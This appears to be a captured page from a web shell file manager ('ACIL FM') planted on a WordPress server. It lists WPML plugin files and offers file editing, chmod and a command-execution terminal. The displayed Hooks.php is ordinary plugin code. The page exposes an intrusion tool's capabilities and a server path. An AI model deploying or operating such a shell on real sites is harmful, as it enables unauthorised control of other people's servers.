ACIL FM
Dark
Refresh
Current DIR:
/home/mhhtmff/www/site/wp-content/plugins/sitepress-multilingual-cms/classes/ATE/Log
/
home
mhhtmff
www
site
wp-content
plugins
sitepress-multilingual-cms
classes
ATE
Log
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
Entry.php
1.76 MB
chmod
View
DL
Edit
Rename
Delete
EventsTypes.php
878 B
chmod
View
DL
Edit
Rename
Delete
Hooks.php
771 B
chmod
View
DL
Edit
Rename
Delete
Storage.php
1.99 MB
chmod
View
DL
Edit
Rename
Delete
View.php
2.41 MB
chmod
View
DL
Edit
Rename
Delete
ViewFactory.php
197 B
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/mhhtmff/www/site/wp-content/plugins/sitepress-multilingual-cms/classes/ATE/Log/Hooks.php
<?php namespace WPML\TM\ATE\Log; class Hooks implements \IWPML_Backend_Action, \IWPML_DIC_Action { const SUBMENU_HANDLE = 'wpml-tm-ate-log'; /** @var ViewFactory $viewFactory */ private $viewFactory; public function __construct( ViewFactory $viewFactory ) { $this->viewFactory = $viewFactory; } public function add_hooks() { add_action( 'admin_menu', [ $this, 'addLogSubmenuPage' ] ); } public function addLogSubmenuPage() { add_submenu_page( WPML_PLUGIN_FOLDER . '/menu/support.php', __( 'Advanced Translation Editor Error Logs', 'wpml-translation-management' ), 'ATE logs', 'manage_options', self::SUBMENU_HANDLE, [ $this, 'renderPage' ] ); } public function renderPage() { $this->viewFactory->create()->renderPage(); } }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply